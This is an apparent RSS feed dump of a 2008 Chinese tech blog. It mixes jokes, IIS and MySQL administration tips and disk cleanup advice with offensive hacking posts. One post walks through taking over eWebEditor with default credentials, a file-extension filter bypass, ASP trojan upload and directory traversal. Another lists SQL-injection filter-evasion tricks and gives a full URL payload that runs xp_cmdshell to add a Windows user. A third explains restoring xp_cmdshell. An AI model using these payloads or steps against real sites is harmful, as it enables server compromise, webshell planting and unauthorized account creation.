<![CDATA[LiJun027's Blog]]> http://drler.net/ PJBlog2 2008-06-29T11:24:01+08:00 <![CDATA[男人用伟哥的目的是什么? ]]> LiJun027 http://drler.net/ drler@126.com 2008-06-29T11:24:01+08:00 2008-06-29T11:24:01+08:00
女选手红着脸思考了很久说:“想不出来。”

主持人立即说:“恭喜你答对了! ”

席下一片议论:“回答的太精辟了! ”]]> http://drler.net/default.asp?id=1004 <![CDATA[3389技巧整理]]> LiJun027 http://drler.net/ drler@126.com 2008-04-26T16:21:59+08:00 2008-04-26T16:21:59+08:00
隐藏内容 隐藏内容
该内容已经被作者隐藏,只有会员才允许查阅 登录 | 注册
]]> http://drler.net/default.asp?id=1003 <![CDATA[批处理设置服务器安全,最方便的处理方式]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T11:23:01+08:00 2008-04-25T11:23:01+08:00
青云服务器安全设置器:http://safe.atimg.com/ThecSafe1.9.3.2.rar
聚友系统文件权限设置:http://www.juyo.org/upload/2008/4/DirectorySafe.rar
服务器安全辅助设置工具v1.52:thunder://QUFodHRwOi8vZG93bi4xNjhjb2RlLmNvbS8yMDA4LzAzLzE2OGNvZGVfU3J2R2FyZC5yYXJaWg== 

下载文件 点击下载此文件
下载文件 点击下载此文件
]]> http://drler.net/default.asp?id=1002 <![CDATA[xp_cmdshell的删除及恢复方法总结]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T10:57:05+08:00 2008-04-25T10:57:05+08:00 1、判断xp_cmdshell是否存在 
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’) 

select count(*) from master.dbo.sysobjects where xtype=’x’ and 
返回结果为1就ok 


2、恢复xp_cmdshell的方法   
删除扩展存储过过程xp_cmdshell的语句   
exec sp_dropextendedproc ’xp_cmdshell’   

恢复cmdshell的sql语句   
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’   

exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and   
返回结果为1就ok   

否则需上传c:\inetput\web\xplog70.dll后   
exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;--   

如果是用以下方法删除   
drop procedure sp_addextendedproc   
drop procedure sp_oacreate   
exec sp_dropextendedproc ’xp_cmdshell’   

则可以用以下语句恢复   
dbcc addextendedproc ("sp_oacreate","odsole70.dll")   
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")   
这样可以直接恢复,不用去管sp_addextendedproc是不是存在   ]]> http://drler.net/default.asp?id=1001 <![CDATA[windows2003服务器上IIS占用CPU资源100%的解决办法]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T10:54:50+08:00 2008-04-25T10:54:50+08:00 现象:机器正在调试或允许IIS时,被异常中断服务(比如停电),然后再次IIS运行页面时,CPU资源占用100%,即使重新启动也无效。 
原因:发生中断时,IIS会写异常日志,但是此时写入了乱码,造成IIS一直写日志的死循环,耗尽了系统资源。找到系统路径\System32\Logfiles\W3SVC1 下当天的错误日志文件,即可看到以上内容。 
解决:删除 系统路径\System32\Logfiles\W3SVC1 下当天的错误日志文件,如:ex060904.log,然后重新启动IIS即可。 


以下是方案2:
环境:win2003server+IIs+ASP+MSSQL 
现象:每隔一段时间(不定,有时几分钟,有时半小时)出现一次网站打开非常缓慢,甚至有时会出现超时打不开站点,此时查看服务器端的进程,CPU占用率达到100%,其中w3wp占用70~80%,SQL占用20~30%。所有服务器端的操作也变得缓慢 
初期解决方法:每次现象出现时,立即登录服务器直接结束w3wp进程或重启IIS服务,平均每天约十次操作,由于服务器存放于远程机房,所有操作都是远程控制进行,有时会因此出现远程无法连接登录的情况,只能通过电话通知机房管理人员重启服务器解决,此过程导致用户抱怨不断 
经过网上查阅资料,发现此类现象多数由于网页代码不合理所致,以下情况会导致此类现象发生:  
1、代码中多处使用application、seesion等服务器缓存,导致服务器资料过度占用; 
2、代码有不合理语法,死循环等; 
3、数据库损坏,尤其是ACCESS数据库;  
4、装过多第三方软件或插件,与IIS或网页功能代码冲突。  
第一阶段排查:根据查阅到的参考资料逐项分析 
1、服务器上所有站点代码均为公司设计人员自行编写,可证实并无过多调用服务器缓存语法(排除) 
2、代码是否存在不合理语法(不确定) 
3、根据情况来看,IIS进程占用率升高时,SQL占用率同时升高,应为SQL数据库的站点,根据现象判断,库或表应该正常,估计是数据方面可能有误;(不确定)  
4、服务器端除了基本的系统服务,防杀毒及网站运作必备服务之外,并无多余第三方软件,机率不大(排除)。 

经过以上分析判断,将不确定项连起来得出的结论是:某个采用了SQL数据库的网站网页代码存在不合理语法,导致IIS和SQL进程CPU占用率过高。 

第二阶段排查: 
确定范围,接着继续把范围缩小。 
由于服务器上采用SQL数据库的站点并不多,便于建立独立进程ID来观察,将所有采用SQL数据库的站点在IIS管理器中分别建立独立的应用程序池,然后通过CMD界面输入:iisapp -a 命今查看并记录下各IIS池的进程ID号,通过多次现象重现时的观察,有个IIS进程ID是导致此次问题的罪魁祸首。  


以下是方案3:
在IIS6下,经常出现w3wp.exe的内存及CPU占用不能及时释放,从而导致服务器响应速度很慢。  
  
解决内存占用过多,可以做以下配置:  
1、在IIS中对每个网站进行单独的应用程序池配置。即互相之间不影响。 
2、设置应用程序池的回收时间,默认为1720小时,可以根据情况修改。再设置当内存占用超过多少(如500M),就自动回收内存。 

解决CPU占用过多: 
1、在IIS中对每个网站进行单独的应用程序池配置。即互相之间不影响。 
2、设置应用程序池的CPU监视,不超过25%(服务器为4CPU),每分钟刷新,超过限制时关闭。  

根据w3wp取得是那个一个应用程序池:   
1、在任务管理器中增加显示pid字段。就可以看到占用内存或者cpu最高的进程   
2、在命令提示符下运行iisapp -a。注意,第一次运行,会提示没有js支持,点击确定。然后再次运行就可以了。这样就可以看到pid对应的应用程序池。(iisapp实际上是存放在C:\windows\system32目录下的一个VBS脚本,全名为iisapp.vbs,如果你和我一样,也禁止了Vbs默认关联程序,那么就需要手动到该目录,先择打开方式,然后选“Microsoft (r) Windows Based Script Host”来执行,就可以得到PID与应用程序池的对应关系。) 
3、到iis中察看该应用程序池对应的网站,就ok了,做出上面的内存或CPU方面的限制,或检查程序有无死循环之类的问题。 ]]> http://drler.net/default.asp?id=1000 <![CDATA[eWebEditor 漏洞汇集]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T10:52:12+08:00 2008-04-25T10:52:12+08:00 各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! 

漏洞利用
利用eWebEditor获得WebShell的步骤大致如下:
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。

然后在上传的文件类型中增加“asa”类型。

5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。


漏洞原理
漏洞的利用原理很简单,请看Upload.asp文件:
任何情况下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!

高级应用
eWebEditor的漏洞利用还有一些技巧:
1.使用默认用户名和密码无法登录。
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
2.加了asa类型后发现还是无法上传。
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了“asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的“asp”删除。


二、ewebeditor遍历路径漏洞
Ewebeditor为非常常见的网站核心程序,
默认数据库为 /db/ewebeditor.mdb 默认路径admin_login.asp 默认管理员admin密码admin(admin888)

ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限.

但是ewebeditor后台有个小小的缺陷. 可以历遍整个网站目录. 当然.数据库为只读的时候一样可以利用.

上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了]]> http://drler.net/default.asp?id=999 <![CDATA[MySql常用命令总结]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T10:50:41+08:00 2008-04-25T10:50:41+08:00   
 两种方法: 一是用winmysqladmin,如果机器启动时已自动运行,则可直接进入下一步操作。 二是在DOS方式下运行 d:\mysql\bin\mysqld
 (假设mysql 安装在d:\mysql);当然也可以 net start mysql命令启动。而Linux中启动时可用“/etc/rc.d/init.d/mysqld start”命令,注 意启动者应具有管理员权限。
 
2、进入mysql交互操作界面
  
  在DOS方式下,运行: d:\mysql\bin\mysql
  出现: mysql 的提示符” mysql> “,此时已进入mysql的交互操作方式。
  如果出现 “ERROR 2003: Can′t connect to MySQL server on ′localhost′ (10061)“,说明你的MySQL还没有启动。
  
3、退出MySQL操作界面
  
  在mysql>提示符下输入quit可以随时退出交互操作界面:  
  mysql> quit
  Bye
  
 
4、第一条命令(多条命令用 “,” 分隔 ,一条命令可以分成多行输入,直到出现分号”;”为止
  
  mysql> select version(),current_date();
  mysql>Select (20+5)*4;
  mysql>Select (20+5)*4,sin(pi()/3);
  mysql>Select (20+5)*4 AS Result,sin(pi()/3); (AS: 指定假名为Result)

5、常用sql 语句

1:使用SHOW语句找出在服务器上当前存在什么数据库:
mysql> SHOW DATABASES;
2:2、创建一个数据库MYSQLDATA
mysql> Create DATABASE MYSQLDATA;
3:选择你所创建的数据库
mysql> USE MYSQLDATA; (按回车键出现Database changed 时说明操作成功!)
4:查看现在的数据库中存在什么表
mysql> SHOW TABLES;
5:创建一个数据库表
mysql> Create TABLE MYTABLE (name VARCHAR(20), sex CHAR(1));
6:显示表的结构:
mysql> DESCRIBE MYTABLE;
7:往表中加入记录
mysql> insert into MYTABLE values (”hyq”,”M”);
8:用文本方式将数据装入数据库表中(例如D:/mysql.txt)
mysql> LOAD DATA LOCAL INFILE “D:/mysql.txt” INTO TABLE MYTABLE;
9:导入.sql文件命令(例如D:/mysql.sql)
mysql>use database;
mysql>source d:/mysql.sql;
10:删除表
mysql>drop TABLE MYTABLE;
11:清空表
mysql>delete from MYTABLE;
12:更新表中数据
mysql>update MYTABLE set sex=”f” where name=’hyq’;
13:插入数据
mysq>linsert into MYTABLE values (1, ‘第二章’, 0×2134545);
14:登录后使用数据库 mysql
mysql -u root -p mysql
mysql -u root -p -h 11.11.11.11 database
15:mysql jdbc连接url 使用中文
jdbc:mysql://localhost/test?useUnicode=true&characterEncoding=gb2312

[separator]

其它:
show processlist;列出每一笔联机的信息。
show varlables;列出mysql的系统设定。
show tables from db_name;列出db_name中所有数据表;
show [full] columns from table_name;列出table_name中完整信息,如栏名、类型,包括字符集编码。
show index from table_name; 列出table_name中所有的索引。
show table status;;列出当前数据库中数据表的信息。
show table status from db_name;;列出当前db_name中数据表的信息。
alter table table_name engine innodb|myisam|memory ;更改表类型
explain table_name / describe table_name ; 列出table_name完整信息,如栏名、类型。
show create table table_name 显示当前表的建表语句
alter table table_name add primary key (picid) ; 向表中增加一个主键
alter table table_name add column userid int after picid 修改表结构增加一个新的字段
alter table table_name character set gb2312 改变表的编码
select user(); 显示当前用户。
select password(’root’); 显示当前用户密码
select now(); 显示当前日期
flush privileges 在不重启的情况下刷新用户权限
mysqld –default-character-set=gb2312 ;设置默认字符集为gb2312

6、安全

刚安装好的MySql包含一个含空密码的root帐户和一个匿名帐户,这是很大的安全隐患,对于一些重要的应用我们应将安全性尽可能提高,在这里应把匿名帐户删除、 root帐户设置密码,可用如下命令进行:

use mysql;
delete from User where User=”";
update User set Password=PASSWORD(’newpassword’) where User=’root’;

改完重启 mysql 才能生效.

上面命令参数是常用参数的一部分,详细情况可参考文档。此处的mydb是要登录的数据库的名称。
在进行开发和实际应用中,用户不应该只用root用户进行连接数据库,虽然使用root用户进行测试时很方便,但会给系统带来重大安全隐患,也不利于管理技术的提高。我们给一个应用中使用的用户赋予最恰当的数据库权限。如一个只进行数据插入的用户不应赋予其删除数据的权限。MySql的用户管理是通过 User表来实现的,添加新用户常用的方法有两个,一是在User表插入相应的数据行,同时设置相应的权限;二是通过GRANT命令创建具有某种权限的用户。其中GRANT的常用用法如下:

grant all on mydb.* to NewUserName@HostName identified by “password” ;
grant usage on *.* to NewUserName@HostName identified by “password”;
grant select,insert,update on mydb.* to NewUserName@HostName identified by “password”;
grant update,delete on mydb.TestTable to NewUserName@HostName identified by “password”;
grant all privileges on *.* to root@localhost
grant select,insert,delete,update,alter,create,drop on lybbs.* to NewUserName@”%” identified by “lybbs”;

若要给此用户赋予他在相应对象上的权限的管理能力,可在GRANT后面添加WITH GRANT OPTION选项。而对于用插入User表添加的用户,Password字段应用PASSWORD 函数进行更新加密,以防不轨之人窃看密码。对于那些已经不用的用户应给予清除,权限过界的用户应及时回收权限,回收权限可以通过更新User表相应字段,也可以使用REVOKE操作。

全局管理权限:
FILE: 在MySQL服务器上读写文件。
PROCESS: 显示或杀死属于其它用户的服务线程。
RELOAD: 重载访问控制表,刷新日志等。
SHUTDOWN: 关闭MySQL服务。
数据库/数据表/数据列权限:
Alter: 修改已存在的数据表(例如增加/删除列)和索引。
Create: 建立新的数据库或数据表。
Delete: 删除表的记录。
Drop: 删除数据表或数据库。
INDEX: 建立或删除索引。
Insert: 增加表的记录。
Select: 显示/搜索表的记录。
Update: 修改表中已存在的记录。
特别的权限:
ALL: 允许做任何事(和root一样)。
USAGE: 只允许登录–其它什么也不允许做。]]> http://drler.net/default.asp?id=998 <![CDATA[C盘空间不足解决办法]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T10:48:11+08:00 2008-04-25T10:48:11+08:00

默认情况下,2003服务器会把所有IIS访问错误的记录写入 C:\WINDOWS\system32\LogFiles\HTTPERR 下的 log 文件中,如果访问量比较大,可能一段时间后 日志文件可能会占满C盘空间,导致服务器死机

同时因为要写入所有的IIS访问记录,如果访问量较大会大大增加服务器CPU占用率

关闭HTTPERR的方法

运行里输入 regedit 进入注册表编辑器
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters]

在右边 点鼠标右键 新建dword值 EnableErrorLogging 重新启动服务器就可以了

"EnableErrorLogging"=dword:00000000 

重起后,2003不再写入HTTPERR日志文件,可以看到服务器CPU占用明显下降!


二、修改存储目录也不失为一个好的办法


寻找:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters

在下面建立一个字符串值.即REG_SZ
数值名称 命名为: ErrorLoggingDir
数值数据 为你指定的路径 比如    D:\logofilse

三、清理一些不重要的文件

1.打开“我的电脑”-“工具”-“文件夹选项”-“查看”-在“显示所有文件和文件夹”选项前打勾-“确定” 

2.删除以下文件夹中的内容: 
x:\Documents and Settings\用户名\Cookies\下的所有文件(保留index文件) 
x:\Documents and Settings\用户名\Local Settings\Temp\下的所有文件(用户临时文件) 
x:\Documents and Settings\用户名\LocalSettings\TemporaryInternet Files\下的所有文件(页面文件) 
x:\Documents and Settings\用户名\Local Settings\History\下的所有文件(历史纪录) 
x:\Documents and Settings\用户名\Recent\下的所有文件(最近浏览文件的快捷方式) 
x:\WINDOWS\Temp\下的所有文件(临时文件) 
x:\WINDOWS\ServicePackFiles(升级sp1或sp2后的备份文件) 
x:\WINDOWS\Driver Cache\i386下的压缩文件(驱动程序的备份文件) 
x:\WINDOWS\SoftwareDistribution\download下的所有文件 

3.如果对系统进行过windoes updade升级,则删除以下文件:x:\windows\下以 $u... 开头的隐藏文件 

4.然后对磁盘进行碎片整理,整理过程中请退出一切正在运行的程序 

5.碎片整理后打开“开始”-“程序”-“附件”-“系统工具”-“系统还原”-“创建一个还原点”(最好以当时的日期作为还原点的名字) 

6.打开“我的电脑”-右键点系统盘-“属性”-“磁盘清理”-“其他选项”单击系统还原一栏里的“清理”-选择“是”-ok了 
7、在各种软硬件安装妥当之后,其实XP需要更新文件的时候就很少了。删除系统备份文件吧:开始→运行→sfc.exe /purgecache近3xxM。(该命令的作用是立即清除"Windows 文件保护"文件高速缓存,释放出其所占据的空间) 

8、删掉\windows\system32\dllcache下dll档 (减去200-300mb),这是备用的dll档, 只要你已 拷贝了安装文件, 完全可以这样做。 
9、XP会自动备份硬件的驱动程序,但在硬件的驱动安装正确后,一般变动硬件的可能性不大,所以也可以考虑将这个备份删除,文件位于\windows\driver cache\i386目录下,名称为driver.cab,你直接将它删除就可以了,通常这个文件是74M。 
10、删除不用的输入法:对很多网友来说,Windows XP系统自带的输入法并不全部都合适自己的使用,比如IMJP8_1 日文输入法、IMKR6_1 韩文输入法这些输入法,如果用不着,我们可以将其删除。输入法位于\windows\ime\文件夹中,全部占用了88M的空间。 
11、升级完成发现windows\多了许多类似$NtUninstallQ311889$这些目录,都干掉吧,1x-3xM 

12、另外,保留着\windows\help目录下的东西对我来说是一种伤害,呵呵。。。都干掉! 
13、关闭系统还原:系统还原功能使用的时间一长,就会占用大量的硬盘空间。因此有必要对其进行手工设置,以减少硬盘占用量。打开"系统属性"对话框,选择"系统还原"选项,选择"在所有驱动器上关闭系统还原"复选框以关闭系统还原。也可仅对系统所在的磁盘或分区设置还原。先选择系统所在的分区,单击"配置"按钮,在弹出的对话框中取消"关闭这个驱动器的系统还原"选项,并可设置用于系统还原的磁盘空间大小。 
14、休眠功能会占用不少的硬盘空间,如果使用得少不妨将共关闭,关闭的方法是的:打开"控制面板",双击"电源选项",在弹出的"电源选项属性"对话框中选择"休眠"选项卡,取消"启用休眠"复选框。 
15、卸载不常用组件:XP默认给操作系统安装了一些系统组件,而这些组件有很大一部分是你根本不可能用到的,可以在"添加/删除Windows组件"中将它们卸载。但其中有一些组件XP默认是隐藏的,在"添加/删除Windows 组件"中找不到它们,这时可以这样操作:用记事本打开\windows\inf\sysoc.inf这个文件,用查找/替换功能把文件中的"hide"字符全部替换为空。这样,就把所有组件的隐藏属性都去掉了,存盘退出后再运行"添加-删除程序", 就会看见多出不少 你原来看不见的选项,把其中那些你用不到的组件删掉(记住存盘的时候要保存为sysoc.inf,而不是默认的sysoc.txt),如Internat信使服务、传真服务、Windows messenger,码表等,大约可腾出近50MB的空间。 

16、清除系统临时文件:系统的临时文件一般存放在两个位置中:一个Windows安装目录下的Temp文件夹;另一个是x:\Documents and Settings\"用户名"\Local Settings\Temp文件夹(Y:是系统所在的分区)。这两个位置的文件均可以直接删除。 
17、清除Internet临时文件:定期删除上网时产生的大量Internet临时文件,将节省大量的硬盘空间。打开IE浏览器,从"工具"菜单中选择"Internet选项",在弹出的对话框中选择"常规"选项卡,在"Internet临时文件"栏中单击"删除文件"按钮,并在弹出"删除文件"对话框,选中"删除所有脱机内容"复选框,单击"确定"按钮。 
18、清除预读文件:Windows XP的预读设置虽然可以提高系统速度,但是使用一段时间后,预读文件夹里的文件数量会变得相当庞大,导致系统搜索花费的时间变长。而且有些应用程序会产生死链接文件,更加重了系统搜索的负担。所以,应该定期删除这些预读文件。预计文件存放在Windows XP系统文件夹的Prefetch文件夹中,该文件夹下的所有文件均可删除。 
19、压缩NTFS驱动器、文件或文件夹:如果你的硬盘采用的是NTFS文件系统,空间实在紧张,还可以考虑启用NTFS的压缩功能。右击要压缩的驱动器-"属性"-"常规"-"压缩磁盘以节省磁盘空间",然后单击"确定", 在"确认属性更改"中选择需要的选项。这样可以节省约20% 的硬盘空间。在压缩C盘的时候,最好在安全模式下压缩,这样效果要好一些。 
20、关闭华医生Dr.Watson:要关闭Dr.Watson可打开注册表编辑器,找到"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AeDebug"分支,双击其下的Auto键值名称,将其"数值数据"改为0,最后按F5刷新使设置生效,这样就取消它的运行了。也在"开始"->"运行"中输入"drwtsn32"命令,或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具">"Dr Watson",调出系统里的华医生Dr.Watson ,只保留"转储全部线程上下文"选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。 

21、关闭远程桌面:"我的电脑"->"属性"->"远程","远程桌面"里的"允许用户远程连接到这台 计算机"勾去掉。 
22、取消XP对ZIP支持:Windows XP在默认情况下打开了对zip文件支持,这要占用一定的系统资源,可选择"开始→运行",在"运行"对话框中键入"regsvr32 /u zipfldr.dll",回车确认即可取消XP对ZIP解压缩的支持,从而节省系统资源。 
23、关闭错误报告:当应用程序出错时,会弹出发送错误报告的窗口,其实这样的错误报告对普通用户而言几乎没有任何意义,关闭它是明智的选择。在"系统属性"对话框中选择"高级"选项卡,单击"错误报告"按钮,在弹出的"错误汇报"对话框中,选择"禁用错误汇报"单选项,最后单击"确定"即可。另外我们也可以从组策略中关闭错误报告:从"运行"中键入"gpedit.msc",运行"组策略编辑器",展开"计算机配置→管理模板→系统→错误报告功能",双击右边设置栏中的"报告错误",在弹出的"属性"对话框中选择"已禁用"单选框即可将"报告错误"禁用。 
24、关掉不用的设备:Windows XP总是尽可能为电脑的所有设备安装驱动程序并进行管理,这不仅会减慢系统启动的速度,同时也造成了系统资源的大量占用。针对这一情况,你可在 设备管理器中,将PCMCIA卡、调制解调器、红外线设备、打印机端口(LPT1)或者串口(COM1)等不常用的设备停用,方法是双击要停用的设备,在其属性对话框中 的"常规"选项卡中选择"不要使用这个设备(停用)"。在重新启动设置即可生效,当需要使用这些设备时再从设备管理器中启用它们。 

25、定期清理系统还原点:打开磁盘清理,选择其他选项->清理系统还原点,点击清理。 

26、卸载不需要的程序. 

27、其它优化: 
A 将应用软件装在其它硬盘(不要安装在系统盘下,这对重装系统也有好处); 
B 将"我的文档"文件夹都转到其他分区:在桌面的"我的文档"图标上是右击鼠标,选择"属性"->"移动" ; 
C 将IE临时文件夹都转到其他分区:打开IE浏览器,选择"工具"->"internet选项"->"常规"->"设置"->"移动文件夹"; 
D 把虚拟内存也转到其它硬盘; 
E 把pagefile.sys文件都指向一个地方:控制面板→系统→性能—高级→虚拟内存→更改,注 意要点"设置"才会生效; 
F 在桌面的"我的电脑"图标上是右击鼠标,选择"属性"->"高级-性能设置"->"高级-虚拟内存",调至330-720。而且定时清理。]]> http://drler.net/default.asp?id=997 <![CDATA[突破SQL脚本注入限制]]> LiJun027 http://drler.net/ drler@126.com 2008-04-25T10:47:02+08:00 2008-04-25T10:47:02+08:00
  经过收集,大部分的防注入程序都过滤了以下关键字:

  and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =

  而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。

  对于关键字的过滤,以下是收集的以及个人的一些想法。

  1、运用编码技术绕过

  如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

  2、通过空格绕过

  如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’ swords’ =‘swords’ ,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。

  3、运用字符串判断代替

  用经典的or 1=1判断绕过,如or ’swords’ =’swords’,这个方法就是网上在讨论的。

  4、通过类型转换修饰符N绕过

  可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。

  5、通过+号拆解字符串绕过

  效果值得考证,但毕竟是一种方法。如 or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )

  6、通过LIKE绕过

  以前怎么就没想到呢?如or ’swords’ LIKE ’sw’!!!显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过

  与上面的LIKE的思路差不多,如or ’swords’ IN (’swords’)

  8、通过BETWEEN绕过

  如or ’swords’ BETWEEN ’rw’ AND ’tw’

  9、通过>或者<绕过

  or ’swords’ > ’sw’

  or ’swords’ < ’tw’

  or 1<3

  ……

  10、运用注释语句绕过

  用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser

  用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

  11、用HEX绕过,一般的IDS都无法检测出来

  0x730079007300610064006D0069006E00 =hex(sysadmin)

  0x640062005F006F0077006E0065007200 =hex(db_owner)

  另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:

  declare @a sysname

  select @a=

  exec master.dbo.xp_cmdshell @a

  效果:http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730 020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--

  其中的 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020 002f00610064006400 就是“net user angel pass /add”的意思。 ]]> http://drler.net/default.asp?id=996 <![CDATA[CB评论看到的笑话]]> LiJun027 http://drler.net/ drler@126.com 2008-04-24T12:46:13+08:00 2008-04-24T12:46:13+08:00 两人住的很近,
问为什么有人找玛丽敲错小明的门,每次小明回答总挨揍?! ! 因为小明老回答~~玛丽,隔壁~~~~~~~很黄 很暴力  ]]> http://drler.net/default.asp?id=995